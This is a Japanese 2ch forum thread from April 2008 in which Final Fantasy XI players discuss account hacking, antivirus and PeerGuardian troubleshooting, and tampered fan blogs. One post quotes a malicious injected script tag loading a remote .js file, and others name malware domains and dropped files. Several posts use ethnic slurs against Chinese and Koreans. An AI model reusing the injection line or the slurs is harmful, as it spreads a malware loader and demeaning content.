ちなみに落とされた直後はすでに通知が消えてて原因わからず(´・ω・`)

355 :既にその名前は使われています:2008/04/08(火) 21:45:08.30 ID:H4N1SG0v
>>354
カスペ前にアンチウイルスソフトは何を入れてたか。
一部アンチウイルスソフトはメーカーHPのアンインストーラーじゃないと完全に消せない
場合がある。

上記の場合じゃないのなら 
STOPエラーのデバッグ
http://www.nextftp.com/to-i/analyze.htm
に書いてるやり方でエラーログ取ってみる。

356 :既にその名前は使われています:2008/04/08(火) 22:02:35.74 ID:dOAGvk0o
>>351
厚顔無恥にも「聖火妨害はオリンピック精神に反するアル」とかいっちゃってるんだぜ?
あの国・・・いや、土着民はすげーぜ。

357 :既にその名前は使われています:2008/04/08(火) 22:06:23.50 ID:dOAGvk0o
>>355
5年前、俺がアンインスコしようとして俺の買ったばかりノートパソコンのシステムを破壊してくれたのはノーパソにプレインスコされてたノートン先生試用版でした。

358 :既にその名前は使われています:2008/04/08(火) 22:20:38.63 ID:ErhTjVZt
>352
支那サイト張るなヴォケガIV

220●166●64●194
China Mianyang

359 :既にその名前は使われています:2008/04/08(火) 22:30:04.55 ID:cWFtvzkk
ヤフー知恵袋にも出た中国臓器狩り問題
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1210787272
政府が犯罪者の集まりだからな、どうしようもない。
13億弱の国民がいて、そのたった6%の共産党員が政府を管理してるってのがおかしいんだよな。

360 :既にその名前は使われています:2008/04/08(火) 22:31:25.78 ID:6+CqkC4u
>>352
wwws■woshijianren■comにとばされ
exeを入れられる。

そして
MicroSofts.pif、MicroSofts.vbsを入れられ
b.stream

あとは分かるね?

361 :既にその名前は使われています:2008/04/08(火) 22:34:55.82 ID:p65U1Q5Q
>>354
うちもそんな感じだから知りたい。
ノートン2006 > マカフィー > カスペ試用版
再インストールはしておらず、OSからのアプリ削除のみ。
ほぼ毎日毎日0:30頃に全画面モード邪魔されて落ちます。
カスペのスケジュールは無し。システムログ何も無し。プロセス不明。

>>355のは勉強になりそうだけど、症状が青画面じゃないんだ。
FFが落ちてデスクトップに戻るの。一瞬で。

362 :既にその名前は使われています:2008/04/08(火) 22:39:27.82 ID:6+CqkC4u
>>361
ノートン先生のサービスは止めた?

363 :既にその名前は使われています:2008/04/08(火) 22:47:00.47 ID:H4N1SG0v
完全に消すのはこれかな
脳d
http://service1.symantec.com/SUPPORT/INTER/sharedtechjapanesekb.nsf/jp_docid/20051021152149943?OpenDocument&lg=ja&ct=jp&seg=hho&src=jp_hot

マカフィー
http://mcafee.com/japan/mcafee/support/faq/answer_f_install.asp?wk=IN-00006



364 :既にその名前は使われています:2008/04/08(火) 23:12:52.91 ID:i9NHyqYD
Kaspersky Lab Wiki
 ttp://kaspe.2chv.net/wiki/index.php

カスペ(特にKIS)はいろいろ面倒ですよ^^

365 :既にその名前は使われています:2008/04/08(火) 23:18:57.35 ID:PWNMeAwb
【中国の五輪参加状況】
1949年 中華人民共和国 建国
1952年 ヘルシンキ五輪 参加
1956年 メルボルン五輪 選手団が現地に到着後にボイコット(理由は台湾問題)
1960年 ローマ五輪 ボイコット(理由は台湾問題)
1964年 東京五輪 ボイコット(理由は台湾問題)■■開会式当日に合わせて核実験強行■■
1968年 メキシコ五輪 ボイコット(理由は台湾問題)
1972年 ミュンヘン五輪 ボイコット(理由は台湾問題)
1976年 モントリオール五輪 ボイコット(理由は台湾問題)
1980年 モスクワ五輪 ボイコット(理由はアフガン問題)

2008年 北京五輪 「オリンピックと政治を結び付けるな」

366 :318:2008/04/08(火) 23:28:32.61 ID:l/o0hVYx
自IP→外部IPの拒否は、カスペのアクセスでした。
カスペのアップデート鯖は3国に置いてあるやつがあるのかな・・・。

367 :既にその名前は使われています:2008/04/08(火) 23:40:02.68 ID:l/o0hVYx
配布元ファイルへの接続ができませんでした http://dnl-eu4.kaspersky-labs.com/ 2008/04/08 23:37:15
更新元は選択されています           http://dnl-cn2.kaspersky-labs.com/  2008/04/08 23:37:15
配布元ファイルへの接続ができませんでした http://dnl-cn2.kaspersky-labs.com/ 2008/04/08 23:37:36

アップデート鯖に接続できなくてミラーを探している様子。
中国2番鯖にアクセスしているようで、弾かれてるのは当然だなーとチラシの裏


368 :既にその名前は使われています:2008/04/09(水) 00:18:09.55 ID:pCIlyB9y
あれーーー、カスぺの手動アップで中華に繋がってPG2で弾かれてアップできないーー。
上の方も情報あるんですが、アップ鯖て中華にいつからあるんだ;;
元にはちゃんと戻るんだろうか?

369 :既にその名前は使われています:2008/04/09(水) 00:21:01.49 ID:Nt5MIhIb
>>368
解除しれ。
タスクトレイからPG2を出して、履歴を表示>ブロックタブ
そこに青字でブロックしたIPが出てるから、カスペのものを確認してから
右クリックして解除。
カスペのIPくらいは自分で調べてくれ。

370 :既にその名前は使われています:2008/04/09(水) 00:22:14.37 ID:HtroEuOl
長文失礼します。質問があるのですが6日から急にPG2の調子がおかしくなったみたいで
今までは8億〜9億(ぐらい)のIPをブロック中と表示されていて
6日から何故か1億5千位しかIPブロックしなくなってしまいました。

FFやる時はP2Pのチェックを外してログインしていたのですが
何故かP2Pのチェックを外さなくてもログイン出来るようになってます。
現在の1億5千位のIPブロックというのが丁度PG2がおかしくなる前の
P2Pのチェックを外している状態のIPブロック数と同じなのです。
どうしてこういう事になってしまったのかお分かりの方おりますでしょうか?

今までは中国、韓国のIPをブロックした時は赤字?で表示されていたのに
今日の昼間から青字でブロックするようになってしまいました。
どうしてIPブロック数が減って急に中国・韓国のブロック文字が青字になって
しまったのかが分からなくて不安でしょうがないです・・・読みづらい文章ですいません


371 :既にその名前は使われています:2008/04/09(水) 00:22:19.60 ID:pCIlyB9y
完全スキャンしてから、一時PG2解除して、手動アップするしかないか。

でも、心当たりないのにいきなりPG2中華に反応したんで焦った;

372 :既にその名前は使われています:2008/04/09(水) 00:27:47.83 ID:Nt5MIhIb
>>371
全部解除じゃなくて該当するIPだけ解除すればいいぞ、ウィキペとかも二つだけ解除すれば
問題なく使える。
>>370
そこまでいくとセキュ板の個別スレで質問してもらわないと分からないな。

【Anti Virus】Kaspersky Lab Part64【カスペルスキー】
http://pc11.2ch.net/test/read.cgi/sec/1207582504/

lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1129612402/

373 :既にその名前は使われています:2008/04/09(水) 00:33:16.64 ID:pCIlyB9y
>>372
ありです。今回のPG2ガードは感染とは関係ないのですねw汗でしたw

374 :既にその名前は使われています:2008/04/09(水) 01:17:53.43 ID:HtroEuOl
>>372
ありがとうございます。個別スレのほうに質問してみます
しかし、不安でしょうがない・・・急に連続で中国のIPブロックしまくってる(;´ρ`)

375 :既にその名前は使われています:2008/04/09(水) 01:18:16.78 ID:HtroEuOl
>>372
ありがとうございます。個別スレのほうに質問してみます
しかし、不安でしょうがない・・・急に連続で中国のIPブロックしまくってる(;´ρ`)

376 :既にその名前は使われています:2008/04/09(水) 01:27:24.23 ID:Q8ZFix8v
おもくね?

377 :既にその名前は使われています:2008/04/09(水) 01:37:35.22 ID:pCIlyB9y
あああ、372さんの助言でカスペスレ観てきましたが、どうやら更新自体に障害発生の模様ですね。
PG2のIP解除しても関係ないぽいです。(日本含めての更新鯖全般のネットワーク障害ぽいので)
普通のゲーム無縁なユーザーさんも11時ぐらいから障害らしい報告もあり。
現在も復旧してないですね。一部データファイル壊れも共通して発生模様。更新自体も途中でタイムアウト終了も続出。

おそらくは、今日以降にジャストシステムに抗議殺到の可能性有りです。
カスペユーザーは更新鯖が復旧するまでは、おとなしく待っていた方がいいですね。
こういう時こそ、完全スキャンの時間ですw

378 :既にその名前は使われています:2008/04/09(水) 01:48:46.18 ID:jQAe4Y/3
中華がカスペ鯖に喧嘩売ってるからカスペ鯖おかしくなった




とかだったらやだなw

379 :既にその名前は使われています:2008/04/09(水) 01:51:21.84 ID:qXifPfYc
>>378
じゃないの?
今回漏れたのカスペ位見たいだし
流石にマイナー所見落としていて慌てて示威行動ってオチかと

380 :既にその名前は使われています:2008/04/09(水) 02:05:35.37 ID:eZ6vcIm8
>>370
【韓国 中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204348839/543-
あたりからじっくり読むとしあわせになれる予感

381 :354:2008/04/09(水) 02:14:19.14 ID:yColrZ73
>>355
実はFF専用PCの方はセキュリティソフト入れずにやってたんだ。
その代わりネット・メールは一切やらず、ワークグループも未所属。
ホントFF専用だったんだけど今回の件で怖いから体験版を入れてみた。(結果は感染0)

>>361
うちは21:30ぐらいによく落とされる。
定時になんか更新されてるのかなぁ…。

382 :既にその名前は使われています:2008/04/09(水) 02:47:24.13 ID:Nt5MIhIb
今度は2chが攻撃されとる
FreeTibet!!!!

383 :既にその名前は使われています:2008/04/09(水) 02:48:07.38 ID:k6Wvtkmw
書き込みミスるのはそのせいか。

384 :既にその名前は使われています:2008/04/09(水) 03:08:52.16 ID:HtroEuOl
>>380
スレの事教えてもらって有り難かったのですが私のレベルでは理解出来なかったです・・・
うーん。。どうすれば良いのだろう

385 :既にその名前は使われています:2008/04/09(水) 03:25:04.12 ID:k6Wvtkmw
562 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2008/04/08(火) 16:26:21 ID:X8QcCmXD0
おまえらbluetackのtrojanリストが廃止されたのは当然知ってるよな?
PG2本体に組み込まれたリストは古いから宛にするとヘマするぞ。

って書いてるやん
リネ研究所のリストだけでも十分だから変に考えると禿るよ。

386 :既にその名前は使われています:2008/04/09(水) 03:30:28.94 ID:k6Wvtkmw
因みに一億五千はリネ研のMMO・シナ・ニダ・ホンコン・タイワンの総数。
P2PブロックしたければダウソのPG2スレに行けば書いてある。

387 :既にその名前は使われています:2008/04/09(水) 04:12:19.45 ID:fTLOLH+3
リストが長すぎるんだよな。
間のギリシャとか絶対アクセスしに行かないIPも含めちゃって良いから
もっと簡潔に短くならないもんかな。

388 :既にその名前は使われています:2008/04/09(水) 04:47:05.06 ID:HtroEuOl
>>385
>>386
教えて頂きありがとうございました。リネージュ研究所のはブロック出来ている様なので
一先ず安心しました。中国からの連続IPブロックは止まったようです。
今後もおかしなことにならないように祈りつつFF続けたいと思います。感謝です<(_ _)>

389 :既にその名前は使われています:2008/04/09(水) 04:59:09.53 ID:NS1oxS3R
>>387
てか、あのリストも元々は、
リネージュやってる中の有志の作ってくれたもんだしなあ。
しかし、これだけ垢ハック続くと、
FF用の対策ページでも作った方がいいかも知れんね……。

390 :既にその名前は使われています:2008/04/09(水) 05:09:53.28 ID:vxy2MrzG
>>389
いや、情報分散するよりまとめてアカウントハック対策としての
リネ研究所さんにまとめて行ったほうがいいと思う。
FF側としても分かった情報は随時渡すという形で。

まあ分家した場合でも、連絡等は欠かさないことが一番です。


391 :既にその名前は使われています:2008/04/09(水) 05:26:39.22 ID:d5k6YF6Z
マイクロソフトの月例パッチきたようだ。
適用するの忘れずに〜

392 :既にその名前は使われています:2008/04/09(水) 06:06:21.32 ID:znqMHcbw
Updateあげ

393 :既にその名前は使われています:2008/04/09(水) 08:10:22.68 ID:FM9Wz9Px
スクエニ様が対策に乗り出すにはまだまだ犠牲者が足りないようです。
周りに泣き寝入りしている方がいらっしゃいましたら警察に行く様説得してくださいませm(_ _)m

394 :既にその名前は使われています:2008/04/09(水) 10:53:24.70 ID:c7c/PcIx
age

395 :既にその名前は使われています:2008/04/09(水) 11:05:01.89 ID:P/spYUYO
>>393
FFXIAH見る限りじゃ被害者は増えてるんだがなぁ・・・
一向に救済拡大の報告が無いから、見捨てられてるのかもしれん

396 :既にその名前は使われています:2008/04/09(水) 11:30:32.37 ID:1Nu9rqdE
AHで被害者分かるのか?
半年前に突然装備全部処分してキャラ削除したフレ居るんだが、もしかしたらやられたのかもしれん…

397 :既にその名前は使われています:2008/04/09(水) 11:33:53.74 ID:arqSu7L0
高額品をまるで引退バザーのように(しかも複数同一の高額Rare履歴もアリとか)売りまくってるヤツが居るってことじゃね?

398 :既にその名前は使われています:2008/04/09(水) 11:50:59.67 ID:JQdcCjhw
名前に鯖名かピンイン入ってる奴が
競売で買える最終装備・黄金貨・高級家具・種族装備
を売り飛ばしてるのは垢ハックだと判断して一応通報もしてる

399 :既にその名前は使われています:2008/04/09(水) 12:24:39.72 ID:N2oIIl3e
Kujata鯖定期的に高額アイテムレベル1サポなしが
白門でシャウトして売ってるから俺はそいつ通報してんな
通報してから2時間でアカ球出して消えてばろす

400 :既にその名前は使われています:2008/04/09(水) 12:30:26.89 ID:FM9Wz9Px
>>395
そうなんか・・・一番数を把握しているのは運営だが商売上そんな事は公表出来んのだろうな・・・

401 :既にその名前は使われています:2008/04/09(水) 12:31:18.11 ID:RhAmuxu5
おまいらエライぞ!
支援age

402 :272:2008/04/09(水) 13:20:50.63 ID:b1pOHeP1
アカウントハックされた友達からメールきた。

キャラいっぱい作られてた上に全て解約済みだったってさ。
OCNペイオンで支払ってたみたい。

403 :既にその名前は使われています:2008/04/09(水) 14:12:59.40 ID:yA5YVLmb
212まで落ちてる!保守

404 :既にその名前は使われています:2008/04/09(水) 15:13:54.05 ID:FM9Wz9Px
保守

ッてだけRMT関連のスレに書いて回ったら五つ目でアクキン喰らったッスよ・・・

405 :既にその名前は使われています:2008/04/09(水) 15:57:04.22 ID:QjKJF11Z
>>402
作られたキャラ分の料金はハック被害者持ち?

406 :既にその名前は使われています:2008/04/09(水) 16:17:34.06 ID:936ZzC/5
鯖移転費用とか、個々ではたいした金額じゃないかもしれんが
今まで被害にあった人全員分合わせたら結構な額になってそうだよな。

しかしキャラ作って消すのは何のメリットがあってやってるのか。
あいつら単なる嫌がらせに労力裂くような感じじゃないし…
即対処されるようなツール金策でもやらされてたのかね。

407 :既にその名前は使われています:2008/04/09(水) 16:21:45.37 ID:k6Wvtkmw
ツール使用・RMT金庫別垢の履歴上書きとかじゃね?

408 :272:2008/04/09(水) 16:24:51.59 ID:b1pOHeP1
>>405
聞いときます。

409 :既にその名前は使われています:2008/04/09(水) 16:44:21.56 ID:uKjw0ksI
>>406
被害時期を考えると南サンド(S)のデスストーン・エンジェルストーンクエに
使われてたのかもしれん。
新規キャラを次々に作ってワープツールで石取らせて消してたみたいだからな

410 :既にその名前は使われています:2008/04/09(水) 17:49:07.07 ID:k6Wvtkmw
捕手

411 :既にその名前は使われています:2008/04/09(水) 17:58:33.84 ID:xqQgIe8P
>>406
>あいつら単なる嫌がらせに労力裂くような感じじゃないし…
自腹で鯖移動させたりもするから嫌がらせも含んでるだろ

412 :既にその名前は使われています:2008/04/09(水) 18:08:18.63 ID:EBg1Z9Lm
鯖移動は、持ってるアイテムが高く売れそうな鯖でその在庫状況みながら、どこに移動させるか決定してる気がする。

413 :既にその名前は使われています:2008/04/09(水) 18:14:38.25 ID:FM9Wz9Px
>>406
>キャラ作って消すのは何のメリットがあってやってるのか
メリットがあるかもしれないからやる、ッて所じゃないの?
運営側の不正者認定の基準が分からないから考えうる手法を全部試してるんじゃないの?

この場合は作ってから消すまでの期間が短ければ自動的にログが
消されるかもしれない、とか>>407の言う様に同一鯖の同じ名前であれば
それ以前の同盟キャラのログに上書きで調査しがたくなるのかもしれない、と言った効果を狙っていそう。


そう言えばリアル被害について何も公表していないね、スクエニさんは。
>>405の恐れが当たっているとすると公表しないわけがないから
>>411の言うとおり自前で(偽造)クレカとか用意しているのだろうね。

・・・・・・どっちにしろスクエニの事だから公表しないかw

414 :既にその名前は使われています:2008/04/09(水) 18:19:29.30 ID:RhAmuxu5
俺は、うがちすぎと言われるかもしれんけど
鯖移動やキャラ作成で発生する代金は、奴らからのスクエニへの献上金だと思っている…

415 :既にその名前は使われています:2008/04/09(水) 18:56:58.29 ID:eZ6vcIm8
4月のマイクロソフトセキュリティ更新を確認する
http://internet.watch.impress.co.jp/cda/special/2008/04/09/19148.html

ぷらら、Webサイト閲覧時のウイルスチェックサービスを会員向けに提供
http://bb.watch.impress.co.jp/cda/news/21564.html
ぷららで
>トレンドマイクロの企業向けソフト「InterScan Web Security Suite」の技術を採用しており
ってとこが気になるけどw


416 :既にその名前は使われています:2008/04/09(水) 18:58:39.30 ID:OwxrkTVh
まあ、結局はカスペオンラインしちゃうんですけど

417 :既にその名前は使われています:2008/04/09(水) 19:47:07.78 ID:s+2dnbnl
RMT.EXEというものが動いているのを確認したんですけど
これはいったい何なんでしょうか?

418 :既にその名前は使われています:2008/04/09(水) 20:22:39.00 ID:N+gbAi7v
■は、他社比で自慢できるような策の目処が立つまで
だんまりだろうな 目処が立たなければずっと

419 :既にその名前は使われています:2008/04/09(水) 20:22:54.23 ID:k6Wvtkmw
エスパーじゃないのでわかりません。

420 :既にその名前は使われています:2008/04/09(水) 20:44:31.58 ID:pYg09lHE
「STOP RMT!!」プラチナリボン運動
tp://www.stop-rmt.com/

こんな運動してる所もあるのね。協力サイトは殆どRO関係だけど…

421 :既にその名前は使われています:2008/04/09(水) 20:46:57.00 ID:8wbM9BFg
>>420
FF11系でそれ張ってるサイト、折に触れて集めてるんだけど、
まだ31件しか見つけられてないな(´・ω・`)

422 :既にその名前は使われています:2008/04/09(水) 20:48:53.27 ID:rW1vaFMU
>>417
情報が断片過ぎて何も答えられない。

423 :既にその名前は使われています:2008/04/09(水) 21:27:22.38 ID:tyK1F+QI
Adobe、危険度の高い脆弱性を含む計7件を修正した「Flash Player」v9.0.124.0
http://www.forest.impress.co.jp/article/2008/04/09/flashplayer90124.html

FlashPlayerは誰でも使っているだろうから更新推奨。

424 :既にその名前は使われています:2008/04/09(水) 21:50:00.78 ID:g6d0xNhZ
すまん カスペ有料版買ってきて入れたらWindowsファイル共有が使えなくなったんだけど・・・
PC2台あって、2ライセンスのを買ってそれぞれにインストール。
いままでこの2台間でバリバリにファイル転送してたのができなくなった。

どこの設定をいじればいいのかな?

425 :既にその名前は使われています:2008/04/09(水) 21:55:26.11 ID:RhAmuxu5
>>423
ありがとう、更新してきた

426 :既にその名前は使われています:2008/04/09(水) 22:01:19.06 ID:EBg1Z9Lm
>>424
アドレス直打ちすれば繋がる。

というかMP1公開されてるからそれ入れれば直る。
http://www.just-kaspersky.jp/support/v7mp1/

427 :既にその名前は使われています:2008/04/09(水) 22:10:27.00 ID:FM9Wz9Px
>>415
>ユーザーはソフトのインストールが不要で、ブラウザに簡単な
>設定を行なうだけでサイト経由のウイルス感染を防止できるとしている。
他のソフトと併用出来るなら使いたいね。でもブラウザの設定ッて・・・?
プロキシ設定かな?

428 :既にその名前は使われています:2008/04/09(水) 22:28:24.89 ID:7lbbfITI
串だろうね
いくつかのその手のサービスは、荒らしに使われて2chは規制されてたりする

429 :既にその名前は使われています:2008/04/09(水) 22:39:06.43 ID:vtspozAM
ありゃ?フラッシュプレイヤーUPしてもvr.115しか表示されないぞ?

消してから再インストしてみるか…

430 :既にその名前は使われています:2008/04/09(水) 22:39:54.80 ID:NMRkpuWr
IEはやめとけ正直

431 :既にその名前は使われています:2008/04/09(水) 23:55:01.56 ID:S5T+vLeq
IEなんて怖くて使えないよ

432 :既にその名前は使われています:2008/04/10(木) 00:22:08.94 ID:fgpxLKJv
>>421
プラチナリボンは元々ROのサイトだからFF11で貼る人は少ないだろうね
今見に行ったら、ROに限らないような内容に改良されてるようだけど

433 :既にその名前は使われています:2008/04/10(木) 01:02:45.62 ID:C7CiAuxw
ガルカが暴れたタイミングで公式からアナウンス

でも、その後は何もなし

434 :既にその名前は使われています:2008/04/10(木) 01:22:39.74 ID:HuKNsAoO
>>428
串なら専ブラにそれを設定しないだけでいいんじゃねぇか?

435 :既にその名前は使われています:2008/04/10(木) 01:57:26.74 ID:WxaYj55h
ねるまえほっしゅ

436 :既にその名前は使われています:2008/04/10(木) 02:12:27.33 ID:goKKPu9E
ソフト作者のWebサイトが改ざん被害に、スパイウェアのURLを仕込まれる
ttp://headlines.yahoo.co.jp/hl?a=20080409-00000053-imp-sci

437 :既にその名前は使われています:2008/04/10(木) 02:52:05.74 ID:euqBCktW
>>432
プラナリアチンポとか何いってんのかとおもった

438 :既にその名前は使われています:2008/04/10(木) 04:16:28.57 ID:K+D2Z5Dl
ageついでに、不謹慎ながら「ゆっくり踏んで行ってね」のAAを貼ってくれないか?

あのAA好きなんだがw 茶噴く位w

439 :既にその名前は使われています:2008/04/10(木) 06:39:50.08 ID:UowvwwvA
>>436の記事から抜粋

> なお、本件についてサイト管理者に報告したところ、
>HTML/PHPファイルの中身が改ざんされたことを確認したが、
>どのようにして改ざんされたのか、その原因は不明だという。

やれやれ…

440 :既にその名前は使われています:2008/04/10(木) 09:44:10.95 ID:0OaAvpty
浮上

定例WindowsUpdateを忘れるな!
AdobeFlashPlayerも脆弱性を修正した最新バージョンが出ているから必ず更新だ!

441 :既にその名前は使われています:2008/04/10(木) 09:55:23.00 ID:UowvwwvA
IEにoperaや火狐を併用している人が多いと思うけど
AdobeFlashPlayer はブラウザごとにアプデするよーに

442 :既にその名前は使われています:2008/04/10(木) 10:28:21.27 ID:T82aIDKh
あげますにゃ

443 :既にその名前は使われています:2008/04/10(木) 10:34:52.69 ID:pH0sKm9t
>>441
IDすげぇwwあげw

444 :既にその名前は使われています:2008/04/10(木) 12:13:42.29 ID:O7I/D/om
改変Wikiめぐりしてて気づいた
ttp://wiki.livedoor.jp/livedoor256789/d/%a5%ea%a5%f3%a5%afURL%a5%c1%a5%a7%a5%c3%a5%ab%a1%bc%20%c4%c9%b2%c3%a4%ce%a4%aa%c3%ce%a4%e9%a4%bb
ライブドアのWikiにリンク改変対策が実装された。
ちょっと見直したぜ。
書き換えられたリンクは赤のハイライト表示
リンクをクリックすると確認ダイヤログが表示されるようになった。

FC2も何かしろと
FC2Wikiのランキングは改変WikiがBOTであげられてるだろ
酷すぎる^^;

445 :既にその名前は使われています:2008/04/10(木) 12:24:36.51 ID:goKKPu9E
FC2の運営自体が業者なんじゃないかと疑い始めてる今日この頃^^

446 :既にその名前は使われています:2008/04/10(木) 13:42:12.91 ID:hh0Xsp/l
  Θ⌒ヾ 
  Θ  Θ   <保守
 (__Θ_)

447 :既にその名前は使われています:2008/04/10(木) 15:07:52.40 ID:I7+97Kj0
アーガス見た事無いなーログには残っていたが。

448 :既にその名前は使われています:2008/04/10(木) 15:23:27.94 ID:VYfjlVgI
www.2117966.net 支那 でググってみたら
Yahoo地域情報にまでスクリプトが・・・

〒670-0083 兵庫県姫路市<script src=hxxp://www.2117966.net/fuckjp0.js></script>
辻井5-3-10 . ... 住所:姫路市辻井1-12-28 食べたもの:支那そば600円 ... 最終訪店:2004
年. 元祖長浜ラーメン(姫路) ... 極細のストレート麺に脂ぎった濃厚の豚骨スープ ...

日本の脆弱性のあるサイトを片っ端からスキャンしてるっぽいな奴等は


449 :既にその名前は使われています:2008/04/10(木) 15:44:03.93 ID:XTsSvQ6a
http://www.nicovideo.jp/watch/nm2825098
これすごく参考になる


450 :既にその名前は使われています:2008/04/10(木) 16:57:50.66 ID:ywuw5uVB
保守

451 :既にその名前は使われています:2008/04/10(木) 17:19:22.63 ID:zKGiUIit
今さらPS2からPC版に乗り換えようとしてるんですが

パスの抜かれる状況っていうのは、POLパスを保存していた時に
保存された情報が抜かれてしまった時と、ログインするときにキーロガー
タイプのウイルス等に打ち込んだキーを見られた時だけですかね?

それともFF11をPC自体にインストールすれば、自動的に重要な情報も
すでにPC内部にあると思っていいんですかね?

わかりにくかったらすいません。



452 :既にその名前は使われています:2008/04/10(木) 17:22:51.67 ID:HOzhLWd+
>>451 全部

453 :既にその名前は使われています:2008/04/10(木) 17:25:27.98 ID:FIemC6Nx
カスペルのオンラインスキャンの文字化けいつなおるの?

454 :既にその名前は使われています:2008/04/10(木) 17:28:33.97 ID:VYfjlVgI
>>451
トロイを仕掛けられたらPCに入ってるどんな情報でも抜かれることを覚悟しておいたほう
がいい。  備えあれば憂いなし・・・とまではいかないかもしれないがこのスレにあるテンプ
レを参考にセキュリティ環境を整えませう。


455 :既にその名前は使われています:2008/04/10(木) 17:33:36.98 ID:nybxPJIn
>>451
んと、インストールした時点ではまだ重要な情報はない(そもそも保存されてない)
でも、感染した場合には、>>454も言っている様に根こそぎ持っていかれるのを覚悟したほうがいい

感染しなければいいって話だけど、それも難しいのでねぇ・・・

456 :既にその名前は使われています:2008/04/10(木) 17:41:10.08 ID:zKGiUIit
レスどうもです。
パス保存を避けて、ログイン時のときはソフトウェアキーボード等使えば
ある程度防げるんじゃないかなーとか、勝手に思ってました。

やっぱ怖いスね(´・ω・`)




457 :既にその名前は使われています:2008/04/10(木) 18:13:10.89 ID:UXLKhZj0
全然関係ない話でスマン
google先生がvanamonブログ危ないって言っててどうしても誰かに言いたかったんだ
http://www.uploda.org/uporg1361485.jpg.html

458 :既にその名前は使われています:2008/04/10(木) 18:22:41.06 ID:HXGNuAVJ
>>457
>>247-248

459 :既にその名前は使われています:2008/04/10(木) 18:25:19.79 ID:kL21uUCU
■過去改竄被害blog一覧
     黒猫奮闘記(インラインフレーム・1回改竄され修正済み)
     ぺってん(インラインフレーム・1回改竄され修正済み)
     戦士スキー(インラインフレーム・2回改竄され修正済み)
     某青魔道士(インラインフレーム・2回改竄され閉鎖)
     ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
     ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
     ある黒魔道士の軌跡(Javaスクリプト・1回改竄され修正済み)
     FF11初心者の館(Javaスクリプト・1回改竄され修正中)
     Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・2回改竄され修正済み)
     FINAL FANTASY XI 散策日記(インラインフレーム・1回改竄され修正済み)

460 :既にその名前は使われています:2008/04/10(木) 18:26:47.93 ID:kL21uUCU
■過去改竄被害blog一覧
     黒猫奮闘記(インラインフレーム・1回改竄され修正済み)
     ぺってん(インラインフレーム・1回改竄され修正、他ブログへ移転済)
     戦士スキー(インラインフレーム・2回改竄され修正済み)
     某青魔道士(インラインフレーム・2回改竄され閉鎖)
     ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
     ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
     ある黒魔道士の軌跡(Javaスクリプト・1回改竄され修正済み)
     FF11初心者の館(Javaスクリプト・1回改竄され修正中)
     Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・2回改竄され修正済み)
     FINAL FANTASY XI 散策日記(インラインフレーム・1回改竄され修正済み)


461 :既にその名前は使われています:2008/04/10(木) 18:30:08.53 ID:Vn2NZMIA
ぺってんはJUGEMにサイト移転して「ぺってん+」になってるね。

462 :既にその名前は使われています:2008/04/10(木) 18:43:23.06 ID:nTo+ptPj
FC2ブログではその後改竄の話を聞かないがどうなっているのだろうか?

1、FC2ではなく他の一般サイトの改竄にシフトした。
2、今も改竄され続けているが、ヴァナモンBlogの時の様に数時間で戻すので発見できていない。
3、このスレの住人がFC2を見なくなったので報告が上がってこないだけ。
4、既にFC2がこっそりと脆弱性を修正していたためその後改竄されていない。

463 :既にその名前は使われています:2008/04/10(木) 18:47:40.88 ID:UmvVnB18
>>453
もうなおってるみたい

464 :既にその名前は使われています:2008/04/10(木) 19:00:34.73 ID:6u5dSTMa
>>462
4だと思いたいところだなあ。
なかったことにしたいんじゃねかな。公式見解がいまだにないし。

465 :既にその名前は使われています:2008/04/10(木) 19:30:51.72 ID:4GtayDl6
FC2はセキュリティに関する情報公開を!
tp://schutz.blog2.fc2.com/blog-entry-325.html

FC2解約した人はアメーバに移転してるのかしら
http://blog10.fc2.com/s/smartass/file/actg0803.gif

466 :既にその名前は使われています:2008/04/10(木) 19:54:43.88 ID:oPSQM5ld
3じゃね?

467 :既にその名前は使われています:2008/04/10(木) 20:06:16.93 ID:/biO63Wn
最近更新と待ってるんだが、「ミスラ臼魔道士奮闘記」っていうFC2ブログがあるんだが、
ちょっとしたミスで踏んじまった。今カスペスキャン中。

このブログ、最新記事が妙で、なんの記述も無いまっさらな記事なんだよね。
ちょっとソースチェッカーオンラインで見てみたんだが、正直よく分からなくて。

誰か詳しい人いたらサイト調べていただけないだろうか?よろしくお願いします。


件のサイト 閲覧注意 http→hxxpにしてあります
hxxp://rasenff11.blog11.fc2.com/

468 :既にその名前は使われています:2008/04/10(木) 20:09:06.84 ID:PQSywC78
>>467
ギコナビはその書き方でもクリッカブルになる。

469 :既にその名前は使われています:2008/04/10(木) 20:14:03.27 ID:Z7HZksUp
>>467
ブログ自体はかなり前からあるので中華の罠ではないことは判る。
ソース中に胡散臭いものは見つけられなかった。
確かに最新記事はおかしいね。
1月までは更新があった訳だから時期的にひょっとするとやられたかも?


470 :既にその名前は使われています:2008/04/10(木) 20:20:35.06 ID:I7+97Kj0
>>467
ウチの鯖の人じゃないかw
firefoxで閲覧したがノートン先生無反応。あなたのブラウザは何でありますか?

471 :既にその名前は使われています:2008/04/10(木) 20:31:39.77 ID:GnUrGkKK
ギコはこれでもダメッスか! 今回は大丈夫みたいだけど気をつけます

今になって気づいたけど、あれか もしや広告対策? ならそう書いて欲しいのだが
ブラウザはIE7であります。ちょっと実家から戻ってきたばっかりなんで 今度狐と例のアレ 入れとく。
それ以外は一応気を使ってる。AntiVir使ってるし、FlashPlayerも更新したし。

472 :既にその名前は使われています:2008/04/10(木) 21:11:09.48 ID:FxqBOGqA
>>460
KHFF情報局が入ってない
あれ消えたんだっけ?

473 :既にその名前は使われています:2008/04/10(木) 21:25:37.74 ID:I7+97Kj0
>>471
IE7か〜実害あるかどうか知らないけれどやっぱり怖いな〜IEは。
標準搭載ブラウザはセキュアでプアなので十分だと思うけれど
やっぱりユーザービリティ上げてリッチにしないと商売的に困るんだろうね〜。

474 :既にその名前は使われています:2008/04/10(木) 22:17:08.59 ID:VsIhq/Pt
>>472
KHFF情報局て何処に有ります?
ぐぐってもでてこないので詳細が分からないや。

475 :既にその名前は使われています:2008/04/10(木) 23:28:22.82 ID:6mElrDY2
上げついでに
